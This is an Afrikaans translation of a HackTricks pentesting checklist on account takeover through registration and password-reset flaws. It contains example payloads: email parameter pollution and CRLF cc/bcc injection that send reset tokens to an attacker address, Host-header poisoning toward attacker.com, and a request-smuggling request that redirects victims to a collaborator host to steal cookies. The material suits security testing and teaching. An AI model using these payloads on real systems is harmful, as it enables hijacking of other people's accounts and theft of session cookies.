11 KiB
Registrasie & Oorname Kwesbaarhede
Leer AWS hak vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!
Ander maniere om HackTricks te ondersteun:
- As jy wil sien dat jou maatskappy geadverteer word in HackTricks of HackTricks aflaai in PDF-formaat Kontroleer die INSKRYWINGSPLANNE!
- Kry die amptelike PEASS & HackTricks swag
- Ontdek Die PEASS Familie, ons versameling eksklusiewe NFTs
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @carlospolopm.
- Deel jou haktruuks deur PRs in te dien by die HackTricks en HackTricks Cloud github repos.
WhiteIntel
WhiteIntel is 'n donker-web aangedrewe soekenjin wat gratis funksies bied om te kontroleer of 'n maatskappy of sy kliënte deur steel-malware is gekompromiteer.
Hul primêre doel van WhiteIntel is om rekeningoorname en losprysaanvalle te beveg wat voortspruit uit inligtingsteel-malware.
Jy kan hul webwerf besoek en hul enjin gratis probeer by:
{% embed url="https://whiteintel.io" %}
Registrasie Oorname
Duplikaat Registrasie
- Probeer om te genereer met 'n bestaande gebruikersnaam
- Kontroleer variasie in die e-pos:
- hoofletters
- +1@
- voeg 'n paar punte by in die e-pos
- spesiale karakters in die e-posnaam (%00, %09, %20)
- Plaas swart karakters na die e-pos:
test@test.com a
- victim@gmail.com@attacker.com
- victim@attacker.com@gmail.com
Gebruikersnaam Enumerasie
Kyk of jy kan uitfigure wanneer 'n gebruikersnaam reeds geregistreer is binne die aansoek.
Wagwoordbeleid
Skep 'n gebruiker en kyk na die wagwoordbeleid (kyk of jy swak wagwoorde kan gebruik).
In daardie geval kan jy probeer om geloofsbriewe te bruteforce.
SQL Injeksie
Kyk na hierdie bladsy om te leer hoe om rekeningoorname te probeer of inligting te onttrek via SQL Injeksies in registrasievorms.
Oauth Oorname
{% content-ref url="oauth-to-account-takeover.md" %} oauth-to-account-takeover.md {% endcontent-ref %}
SAML Kwesbaarhede
{% content-ref url="saml-attacks/" %} saml-attacks {% endcontent-ref %}
Verander E-pos
Wanneer geregistreer, probeer om die e-pos te verander en kyk of hierdie verandering korrek gevalideer word of dit na willekeurige e-posse kan verander.
Meer Kontroles
- Kyk of jy weggooi-e-posse kan gebruik
- Lang wagwoord (>200) lei tot DoS
- Kyk na tempo-limiete op rekening-skepping
- Gebruik username@burp_collab.net en analiseer die terugroep
Wagwoord Herstel Oorname
Wagwoord Herstel Token Lek via Verwysing
- Versoek wagwoordherstel na jou e-posadres
- Klik op die wagwoordherstel skakel
- Verander nie wagwoord nie
- Klik op enige 3de party webwerwe (bv: Facebook, twitter)
- Onderskep die versoek in Burp Suite proxy
- Kyk of die verwysingskop wagwoordherstel-token lek.
Wagwoord Herstel Vergiftiging
- Onderskep die wagwoordherstel versoek in Burp Suite
- Voeg of wysig die volgende koppe in Burp Suite by:
Host: attacker.com
,X-Forwarded-Host: attacker.com
- Stuur die versoek met die gewysigde kop
http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com
- Soek na 'n wagwoordherstel-URL gebaseer op die host-kop soos:
https://attacker.com/reset-password.php?token=TOKEN
Wagwoord Herstel Via E-pos Parameter
# parameter pollution
email=victim@mail.com&email=hacker@mail.com
# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}
# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com
# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
IDOR op API-parameters
- Aanvaller moet inlog met hul rekening en na die Wagwoord verander-funksie gaan.
- Begin die Burp Suite en onderskep die versoek.
- Stuur dit na die herhalingskategorie en wysig die parameters: Gebruiker-ID/e-pos
powershell POST /api/changepass [...] ("vorm": {"e-pos":"slagoffer@e-pos.com","wagwoord":"veilige wagwoord"})
Swak Wagwoord-herstelteken
Die wagwoord-herstelteken moet ewekansig gegenereer en uniek wees elke keer.
Probeer bepaal of die teken verval of altyd dieselfde is, in sommige gevalle is die genereringsalgoritme swak en kan geraden word. Die volgende veranderlikes kan deur die algoritme gebruik word.
- Tydstempel
- Gebruiker-ID
- E-pos van Gebruiker
- Voornaam en Van
- Geboortedatum
- Kriptografie
- Slegs nommer
- Klein tekenreeks (karakters tussen [A-Z,a-z,0-9])
- Tekenhergebruik
- Tekenvervaldatum
Uitlek van Wagwoord-herstelteken
- Trigger 'n wagwoord-herstelversoek deur die API/UI vir 'n spesifieke e-pos bv: toets@pos.com
- Inspekteer die bedienerreaksie en soek na
resetToken
- Gebruik dan die teken in 'n URL soos
https://voorbeeld.com/v3/gebruiker/wagwoord/herstel?resetToken=[DIE_RESET_TEKEN]&e-pos=[DIE_POS]
Wagwoord-herstel via Gebruikersnaam-botsing
- Registreer op die stelsel met 'n gebruikersnaam identies aan die slagoffer se gebruikersnaam, maar met spasies ingevoeg voor en/of na die gebruikersnaam. bv:
"admin "
- Vra 'n wagwoordherstel met jou skadelike gebruikersnaam aan.
- Gebruik die teken wat na jou e-pos gestuur is en herstel die slagoffer se wagwoord.
- Koppel aan die slagoffer se rekening met die nuwe wagwoord.
Die platform CTFd was vatbaar vir hierdie aanval.
Sien: CVE-2020-7245
Rekening-oorneem via Kruissite-skripsing
- Vind 'n Kruissite-skripsing binne die aansoek of 'n subdomein as die koekies toegespits is op die ouer domein:
*.domein.com
- Laat die huidige sessiekoekie uitlek.
- Verifieer as die gebruiker deur die koekie.
Rekening-oorneem via HTTP-versoeksmokkel
1. Gebruik smuggler om die tipe HTTP-versoeksmokkeling (CL, TE, CL.TE) op te spoor
powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h
2. Stel 'n versoek op wat die POST / HTTP/1.1
sal oorskryf met die volgende data:
GET http://iets.burpcollaborator.net HTTP/1.1 X:
met die doel om die slagoffers na burpcollab te oopverwys en hul koekies te steel
3. Die finale versoek kan so lyk:
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0
GET http://something.burpcollaborator.net HTTP/1.1
X: X
Hackerone-rapporteerders wat hierdie fout uitgebuit het
* https://hackerone.com/reports/737140
* https://hackerone.com/reports/771666
Rekening-oorneem deur CSRF
- Skep 'n lading vir die CSRF, bv: "HTML-vorm met outomatiese indiening vir 'n wagwoordverandering"
- Stuur die lading
Rekening-oorneem deur JWT
JSON Web Token kan gebruik word om 'n gebruiker te verifieer.
- Wysig die JWT met 'n ander Gebruiker-ID / E-pos
- Kontroleer vir swak JWT-handtekening
{% content-ref url="hacking-jwt-json-web-tokens.md" %} hacking-jwt-json-web-tokens.md {% endcontent-ref %}
Verwysings
WhiteIntel
WhiteIntel is 'n donkerweb-aangedrewe soekenjin wat gratis funksies bied om te kontroleer of 'n maatskappy of sy kliënte deur diewe-malware gekompromitteer is.
Die primêre doel van WhiteIntel is om rekening-oorneem en lospryse-aanvalle te bekamp wat voortspruit uit inligtingsteel-malware.
Jy kan hul webwerf besoek en hul enjin gratis probeer by:
{% embed url="https://whiteintel.io" %}
Leer AWS-hacking van niks tot held met htARTE (HackTricks AWS Red Team Expert)!
Ander maniere om HackTricks te ondersteun:
- As jy wil sien dat jou maatskappy geadverteer word in HackTricks of HackTricks aflaai in PDF-formaat Kontroleer die INSKRYWINGSPLANNE!
- Kry die amptelike PEASS & HackTricks-klere
- Ontdek Die PEASS-familie, ons versameling eksklusiewe NFT's
- Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
- Deel jou haktruuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-opslag.